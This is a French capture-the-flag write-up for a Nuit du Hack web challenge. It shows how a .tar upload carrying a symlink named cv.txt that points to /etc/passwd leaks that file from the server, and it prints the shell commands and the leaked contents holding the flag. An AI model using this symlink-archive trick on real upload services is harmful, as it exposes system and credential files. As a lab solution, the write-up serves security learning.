Web 100 points http://quals.nuitduhack.com/challenges/view/11

http://facesec.challs.nuitduhack.com/

“Hello there,

We are looking for a developer or security consultant to secure our filebox system. We stumbled upon your LinkedIn profile and it seems like you would be a perfect candidate for this job. Could you please send us your CV and Motivation letter?

Thanks,

faceSec HR Director.”

Ce challenge permet, après s'être enregistrer, d'uploader des fichier .txt à la fois en terme de CV et de lettre de motivation. On peut également uploader un fichier .tar contenant un fichier cv.txt et un fichier motiv.txt

Ce chalenge rappel la vulnérabilité de Facebook du mois de décembre http://josipfranjkovic.blogspot.fr/2014/12/reading-local-files-from-facebooks.html néanmoins on doit uploader un fichier .tar et non un fichier .zip.

On créé donc un fichier cv.txt avec un lien symbolique vers /etc/passwd/ et un fichier motiv.txt avec du contenu « random ». On tar ces deux fichiers.

  ln -s /etc/passwd cv.txt
  echo plop > motiv.txt
  tar cvf tar.tar *.txt
      cv.txt
      motiv.txt

On upload le fichier tar.tar et on récupère le fichier /etc/passwd/ :

  root:x:0:0:root:/root:/bin/bash
  daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh
  sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync
  games:x:5:60:games:/usr/games:/bin/sh
  man:x:6:12:man:/var/cache/man:/bin/sh
  lp:x:7:7:lp:/var/spool/lpd:/bin/sh
  mail:x:8:8:mail:/var/mail:/bin/sh
  news:x:9:9:news:/var/spool/news:/bin/sh
  uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
  proxy:x:13:13:proxy:/bin:/bin/sh
  www-data:x:33:33:www-data:/var/www:/bin/sh
  backup:x:34:34:backup:/var/backups:/bin/sh
  list:x:38:38:Mailing List
  Manager:/var/list:/bin/sh
  irc:x:39:39:ircd:/var/run/ircd:/bin/sh
  gnats:x:41:41:Gnats
  Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
  nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
  libuuid:x:100:101::/var/lib/libuuid:/bin/sh
  sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin
  facesec:x:1000:1000:W00tSymL1nkAttackStillW0rksIn2k15:/home/facesec:/bin/sh

Le flag est W00tSymL1nkAttackStillW0rksIn2k15.